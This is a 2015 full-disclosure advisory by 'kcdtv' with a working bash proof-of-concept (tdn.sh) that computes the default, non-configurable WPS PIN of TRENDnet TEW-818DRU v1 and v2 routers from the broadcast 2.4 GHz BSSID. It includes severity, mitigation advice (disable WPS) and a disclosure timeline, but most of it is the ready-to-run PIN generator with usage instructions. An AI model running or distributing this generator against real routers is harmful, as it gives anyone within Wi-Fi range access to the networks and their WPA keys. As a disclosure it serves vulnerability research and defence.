TRENDnet TEW-818RDU versions 1 ("ac1900") and 2 ("ac3200") PIN disclosure exploit.
009d8d367598cb87819d868de644c6b1b9cfadd95a5147b5bc510f5a951e0427
########################################################################################################
# Title of the breach : Full disclosure of default PIN algorithm with PoC (tdn.sh) for TRENDnet TEW-818RDU v.1 ("ac1900") and v.2 ("ac3200")
# Credits : kcdtv
# Originaly disclosed the 29th june 2014 for the first version of TEW-818RDU (ac1900) in www.crack-wifi.com
# Link : http://www.crack-wifi.com/forum/topic-10657-trendnet-tew-818dru-ac19000-full-disclosure-wps-pin.html
# Fully disclosed the 25th of june 2015 for version 1 and 2 (ac3200) with PoC bash code (tdn.sh) in www.wifi-libre.com
# Link : https://www.wifi-libre.com/topic-160-algoritmo-pin-para-tew-818rdu-v1-ac1900-y-v2-ac3200-de-trendnet.html
################################################### AFFECTED DEVICE ##########################################################
# TEW-818DRU version 1 (ac1900) : A dual-band access point manufactured by TRENDnet - you can check the administration interface here : http://www.trendnet.com/emulators/TEW-818DRU_v1/login.htm
# TEW-818DRU version 2 (ac3200) : The last revision of this router, the fastest router manufactured by TRENDnet with trial-band - you can check the administration interface here : http://www.trendnet.com/emulators/TEW-818DRU_v1/login.htm
################################################### DESCRIPTION OF THE BREACH #################################################
### DANEGEROUS WPS SETTINGS
# The two versions use the same kind of (bad) WPS settings
# * The WPS in PIN mode is activated by default
# * It has a PIN enabled that is not configurable. A static PIN.
# * This non configurable PIN is also unique : it is used by all the networks (2.4 and 5 Ghz bands)
# It is already a bad configuration whith the possibility tu brute force the hahses from the M3 ("pixiedust" attack) or tu perform a classical brute force of the PIN itself with reaver or bully
#### BSSID BASED ALGORITHM REVERSED
# It is the second half of the 2.4 Ghz bSSID (NIC) that is used to generate this unique, non-configurable and activated PIN
# The bSSID is broadcasted and can be gathered with a simple wireless scan
# Instead of using - as it has been done with many other devices including some older trendnet devices - a straightforward hexadecimal to decimal conversion of this portion of the bssid to generate the PIN; The trendnet crew "updated" the concept by inverting the first and the last byte of the string before conversion. My english is "so-so" so let's take a very simple example to illustrate it
### STEP 1
# Grab the the bSSID of the 2.4 ghz network, as an example we will take 00:00:00:11:22:33
### STEP 2
# Grab the second half (NIC portion) of this bSSID. That would be 11:22:33 in our example
### STEP 3
# Invert the last and first byte of this string. It gives us 33:22:11
### STEP 4
# Convert from hexadecimal to decimal. It gives us 3351057
### STEP 5
# Generate the WPS checksum to get the full PIN. If the string obtained previously is superior to 9999999 you will have to take away the superior unity to get a 7 digit length string. If the string value is inferior to 1000000 you will have to perform some zero-padding until you get a 7 digit long string. In our example we get the PIN 33510576.
#See the annotated script tdn.sh for more details.
################################################## SEVERITY ##################################################################
# A person within the wifi area of the router can get access to both 5Ghz and 2.4Ghz networks immediately by sending the correct PIN. He will also have the WPA key that could be used in order to perform much more intrusive actions (decrypt traffic, MITM...)
################################################# SOLUTION ##################################################################
# Risks are very high but it is by chance very simple to secure the WiFi network by disabling the WPS in the configuration interface
# As a recommendation for your safety: - do not use the WPS and be sure that it is absolutely disabled in every mode
# - you should install DD-WRT in this devices instead of the original firmware
################################################### TIMELINE ##################################################################
# 16-06-2014 : I noticed the weak algorithm by visiting trendnet emulator for this device (see link in "AFFECTED DEVICE")
# 17-06-2014 : I wrote to Trendnet to ask them if the data in the web interface are correct and if the algorithm I found is the one really used
# 29-06-2014 : No answer from trendnet so i published my study in crack-wifi.com http://www.crack-wifi.com/forum/topic-10657-trendnet-tew-818dru-ac19000-full-disclosure-wps-pin.html
# february 2015 : I found on the web some datas and they confirmed the use of this algorithm : https://www.youtube.com/watch?v=HyfIX1B8cx0
# 25-06-2015 : One year after and with the newest version affected I decide to fully disclose the breach with a PoC script, tdn.sh : https://www.wifi-libre.com/topic-160-algoritmo-pin-para-tew-818rdu-v1-ac1900-y-v2-ac3200-de-trendnet.html
############################################### CREDITS ###############################################################
# kcdtv
############################################### WEBSITE(s)#############################################################
# www.wifi-libre.com
# www.crack-wifi.com
############################################ HOW TO USE THIS POC ############################################
# Save this text in a blank document that you can call tdn.sh
# locate a terminal in the folder where you saved the script (cd or right clik + open terminal here )
# Launch the script form the shell with :
# bash tdn.sh
# Enter the full bSSID of the 2.4 Ghz network in hexadecimal format (ex : 00:90:4C:0F:F4:D2 ) and press enter
############################################## SCRIPT (read comments for explanation about algorithm #######
#!/bin/bash
#################################################### LEGAL ADVISORY ####################################################################
# tdn.sh copyleft 25th June 2015 :
# This scripts is edited under the General Public License version 3 from the Free software foundation.
# This package is distributed in the hope that it will be useful, but without any warranty; It can be used and modified and shared but should be referenced to according to GPL v3 terms
# It CANNOT be sold or used for a commercial-economical purpose.
# See for more details about GPL v3 : http://gplv3.fsf.org/
NOcolor="\033[0;37m" # colors are set as variable
red="\033[1;31m"
purpple="\033[0;35m"
yellow="\033[1;33m"
white="\033[1;37m"
victorycolor="\033[1;43m"
ALGORITHM(){
###############################
# The algorithm can be divided in three steps. The two first steps are done in this function and the third one is done by the other function called "CEHCKSUM()"
# 1) The first step in the algorithm consist in changing the order of the last three bytes of the 2.4 Ghz (b/g/n) bssid to get a string ( defined hin this code as the variable "$SCRAMBLEDNIC". )
# example : if the 2.4 Ghz bSSID is 00:90:4C:10:E4:D2 the string created would be D2E410 (value for $SCRAMBLEDNIC)
SCRAMBELDNIC=$(printf `echo $BSSID | awk -F':' '{ print $6 }'``echo $BSSID | awk -F':' '{ print $5 }'``echo $BSSID | awk -F':' '{ print $4 }'`) # with awk using ":" as a separtor we grab the last bytes of the mac inverting the order
# 2) Once this string is defined it has to be converted from hexadecimal to decimal. In the code the result is saved in the variable #"$CONVERTEDMAC". Some zero padding and reduction with module in base 10 are performed to get a 7 digit number saved in the variable $STRING
CONVERTEDMAC=$(printf '%d\n' 0x$SCRAMBELDNIC) # conversion from hexadecimal to decimal
STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'` # suppression of the first digit if the string is longer than 7 digits
# The PIN is generated, we just have to add the WPS checksum to create a full valid WPS PIN with the function "CHECKSUM")
}
CHECKSUM(){ # The function checksum was written by antares_145 from crack-wifi.com
PIN=`expr 10 '*' $STRING` # And generate the 8th digit of a WPS PIN
ACCUM=0 #
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # To generate it we multiply the first digit of the PIN by 3
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` # The second digit by one
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` # The third digit by three
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` # etc...
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # ... we are done and all the results are sumed up in $ACCUM
DIGIT=`expr $ACCUM '%' 10` # we define our digit control: the sum reduced with base 10 to the unit number
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the checksum is equal to " 10 minus digit control "
PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # Some zero-padding in case that the value of the PIN is under 10000000
}
######################################################POC START HERE######################################################
echo -e "
$yellow .----------------. .----------------. .-----------------.
$yellow| .--------------. || .--------------. || .--------------. |
$yellow| |$red _________ $yellow | || |$red ________ $yellow | || |$red ____ _____$yellow | |
| |$red | _ _ |$yellow | || |$red |_ ___ .$yellow | || |$red|_ \|_ _|$yellow | |
| |$red |_/ | | \_|$yellow | || |$red | | . \ $yellow| || |$red | \ | |$yellow | |
| |$red | | $yellow | || |$red | | | | $yellow| || |$red | |\ \| |$yellow | |
| |$red _| |_ $yellow | || |$red _| |___.' / $yellow| || |$red _| |_\ |_ $yellow | |
| |$red |_____| $yellow | || |$red |________.' $yellow| || |$red|_____|\____|$yellow | |
| | | || | | || | | |
| '--------------' || '--------------' || '--------------' |$white.sh$yellow
'----------------' '----------------' '----------------'
$purpple DEFAULT PIN GENERATOR FOR$yellow TRENDNET$red TEW-818DRU$white VERSION.1$NOcolor ($red ac1900 $NOcolor)
$purpple AND$yellow TRENDNET$red TEW-818DRU$white VERSION.2$NOcolor ($red ac3200 $NOcolor)
GPL.3 code by$yellow kcdtv$NOcolor for
$red www.wifi-libre.com $yellow www.crack-wifi.com$NOcolor"
echo -e "$NOcolor"
echo -e " -------------------------------------"
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID # bssid is introduced as a variable
echo -e "$NOcolor"
while !(echo $BSSID | tr a-f A-F | egrep -q "^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$")
do # filter for checking the conformity bssid with loop over condition thanks to antares ;)
echo -e " $red Error :$white MAC No Conforme $NOcolor"
echo -e "$yellow*$NOcolor You must enter the full 2.4 ghz bSSID in hexadecimal format
(ex:$red 00:90:4C:10:E4:D2$NOcolor )"
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID
echo -e "$NOcolor"
done
OUICHECK=$(printf `echo $BSSID | awk -F':' '{ print $1 }'``echo $BSSID | awk -F':' '{ print $2 }'``echo $BSSID | awk -F':' '{ print $3 }'`)
if [[ $OUICHECK != 0014D1 ]] || [[ $OUICHECK != 0014D1 ]] ;
then
echo -e "$red warning$NOcolor : This mac adress does not belong to$white TRENDnet$NOcolor"
fi
ALGORITHM # function that scramble the NIC part of the bssid and convert it from decimal to hexadecimal
CHECKSUM # function that generate the correct wpschecksum and gives the full default WPS PIN for Tew-818DRU
echo -e "
$white The default$red PIN$white for 5ghz and 2,4ghz network is $victorycolor$PIN$NOcolor
$NOcolor for support visit$yellow www.wifi-libre.com$NOcolor
"
exit 0